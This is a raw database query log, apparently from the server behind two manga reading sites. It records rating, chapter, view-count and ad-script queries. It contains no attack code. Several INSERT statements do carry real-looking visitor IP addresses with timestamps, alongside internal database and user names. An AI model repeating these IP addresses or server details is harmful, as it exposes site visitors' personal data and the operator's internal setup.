mangauser@localhost on u317079482_mangacherri_2 using Socket 330659790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330659790 Quit 330659791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330659791 Quit 330659792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330659792 Quit 330659793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330659793 Quit 330659794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330659794 Quit 330659795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330659795 Quit 330659796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330659796 Quit 330659797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330659797 Quit 330659798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330659798 Quit 330659799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330659799 Quit 330659800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330659800 Quit 330659801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330659801 Quit 330659802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330659802 Quit 330659803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330659803 Quit 330659804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330659804 Quit 330659805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330659805 Quit 330659806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330659806 Quit 330659807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330659807 Quit 330659808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330659808 Quit 330659809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330659809 Quit 330659810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330659810 Quit 330659811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330659811 Quit 330659812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330659812 Quit 330659813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330659813 Quit 330659814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330659814 Quit 330659815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330659815 Quit 330659816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330659816 Quit 330659817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330659817 Quit 330659818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330659818 Quit 330659819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330659819 Quit 330659820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330659820 Quit 330659821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330659821 Quit 330659822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330659822 Quit 330659823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330659823 Quit 330659824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330659824 Quit 330659825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330659825 Quit 330659826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330659826 Quit 330659827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330659827 Quit 330659828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330659828 Quit 330659829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330659829 Quit 330659830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330659830 Quit 330659831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330659831 Quit 330659832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330659832 Quit 330659833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330659833 Quit 330659834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330659834 Quit 330659835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330659835 Quit 330659836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330659836 Quit 330659837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330659837 Quit 330659838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330659838 Quit 330659839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330659839 Quit 330659840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330659840 Quit 330659841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330659841 Quit 330659842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330659842 Quit 330659843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330659843 Quit 330659844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330659844 Quit 330659845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330659845 Quit 330659846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330659846 Quit 330659847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330659847 Quit 330659848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330659848 Quit 330659849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330659849 Quit 330659850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330659850 Quit 330659851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330659851 Quit 330659852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330659852 Quit 330659853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330659853 Quit 330659854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659854 Quit 330659855 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12789' and m.active = 1 330659855 Quit 330659856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659856 Query select * FROM chapters where id = '12789' 330659856 Quit 330659857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659857 Query select * FROM chapters where manga_id = '110' order by display_priority ASC, id desc 330659857 Quit 330659858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659858 Query Update chapters set view=view+1 where id = '12789' 330659859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659858 Quit 330659860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659859 Quit 330659860 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10757' and m.active = 1 330659860 Quit 330659861 Query select * FROM chapters where id = '12789' 330659862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659862 Query select * FROM chapters where id = '10757' 330659862 Quit 330659861 Quit 330659863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659863 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12789' and m.active = 1 330659864 Query select * FROM chapters where manga_id = '219' order by display_priority ASC, id desc 330659863 Quit 330659865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659865 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('110', '12789', '73.10.112.111', 'mangaberri.com', '2026-02-26 03:30:06', '2026-02-26 03:30:06') 330659864 Quit 330659866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659866 Query Update chapters set view=view+1 where id = '10757' 330659865 Quit 330659867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659866 Quit 330659867 Query select * FROM chapter_images where chapter_id = '12789' 330659867 Quit 330659868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659868 Query select * FROM chapters where id = '10757' 330659869 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659869 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '110' and m.active = 1 330659868 Quit 330659870 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659870 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10757' and m.active = 1 330659871 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659871 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='110' and m.active = 1 AND (genres like '%Action%' OR genres like '%Horror%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330659870 Quit 330659869 Quit 330659872 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659872 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('219', '10757', '47.79.205.133', 'mangaberri.com', '2026-02-26 03:30:06', '2026-02-26 03:30:06') 330659872 Quit 330659873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659873 Query select * FROM chapter_images where chapter_id = '10757' 330659873 Quit 330659874 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659874 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '219' and m.active = 1 330659874 Quit 330659875 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659875 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='219' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Magic%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330659871 Quit 330659876 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659877 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659876 Quit 330659877 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659877 Quit 330659878 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659879 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659878 Quit 330659879 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659879 Quit 330659880 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659881 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659880 Quit 330659881 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659881 Quit 330659882 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659883 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659882 Quit 330659883 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659883 Quit 330659875 Quit 330659884 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659885 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659884 Quit 330659885 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659885 Quit 330659886 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659887 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659886 Quit 330659887 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659887 Quit 330659888 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659889 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659888 Quit 330659889 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659889 Quit 330659890 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659891 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659890 Quit 330659891 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659891 Quit 330659892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659892 Quit 330659893 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12584' 330659893 Quit 330659894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659894 Query select * FROM chapters where id = '12584' 330659894 Quit 330659895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659895 Query select * FROM chapters where manga_id = '206' order by id desc 330659895 Quit 330659896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659896 Query Update chapters set view=view+1 where id = '12584' 330659896 Quit 330659897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659897 Query select * FROM chapters where id = '12584' 330659897 Quit 330659898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659898 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12584' 330659898 Quit 330659899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659899 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('206', '12584', '176.41.24.80', 'mangacherri.com', '2026-02-26 03:30:06', '2026-02-26 03:30:06') 330659899 Quit 330659900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659900 Query select * FROM chapter_images where chapter_id = '12584' 330659900 Quit 330659901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659901 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330659901 Quit 330659902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659902 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Mystery%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330659903 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659904 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659903 Quit 330659904 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7998' 330659904 Quit 330659905 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 260225 19:30:07 330659905 Query select * FROM chapters where id = '7998' 330659905 Quit 330659906 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659906 Query select * FROM chapters where manga_id = '193' order by id desc 330659906 Quit 330659907 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659907 Query Update chapters set view=view+1 where id = '7998' 330659907 Quit 330659908 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659908 Query select * FROM chapters where id = '7998' 330659908 Quit 330659909 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659909 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7998' 330659909 Quit 330659910 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659910 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '7998', '82.132.212.73', '2026-02-26 03:30:07', '2026-02-26 03:30:07') 330659910 Quit 330659911 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659911 Query select * FROM chapter_images where chapter_id = '7998' 330659911 Quit 330659912 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659913 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659912 Quit 330659913 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330659913 Quit 330659914 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659914 Query select * FROM chapters where manga_id = '193' order by id desc 330659914 Quit 330659915 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659916 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659915 Quit 330659916 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659916 Quit 330659902 Quit 330659917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659917 Quit 330659918 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659918 Quit 330659919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659919 Quit 330659920 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659920 Quit 330659921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659921 Quit 330659922 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659922 Quit 330659923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659923 Quit 330659924 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659924 Quit 330659925 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659926 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659925 Quit 330659926 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10757' and m.active = 1 330659926 Quit 330659927 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659927 Query select * FROM chapters where id = '10757' 330659927 Quit 330659928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659928 Query select * FROM chapters where manga_id = '219' order by display_priority ASC, id desc 330659928 Quit 330659929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659929 Query Update chapters set view=view+1 where id = '10757' 330659929 Quit 330659930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659930 Query select * FROM chapters where id = '10757' 330659930 Quit 330659931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659931 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10757' and m.active = 1 330659931 Quit 330659932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659932 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('219', '10757', '47.79.205.133', 'mangaberri.com', '2026-02-26 03:30:07', '2026-02-26 03:30:07') 330659932 Quit 330659933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659933 Query select * FROM chapter_images where chapter_id = '10757' 330659933 Quit 330659934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659934 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '219' and m.active = 1 330659934 Quit 330659935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659935 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='219' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Magic%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330659935 Quit 330659936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659936 Quit 330659937 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659937 Quit 330659938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659938 Quit 330659939 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659939 Quit 330659940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659940 Quit 330659941 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659941 Quit 330659942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659942 Quit 330659943 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659943 Quit 330659944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659944 Quit 330659945 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6611' and m.active = 1 330659945 Quit 330659946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659946 Query select * FROM chapters where id = '6611' 330659946 Quit 330659947 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659947 Query select * FROM chapters where manga_id = '134' order by display_priority ASC, id desc 330659947 Quit 330659948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659948 Query Update chapters set view=view+1 where id = '6611' 330659948 Quit 330659949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659949 Query select * FROM chapters where id = '6611' 330659949 Quit 330659950 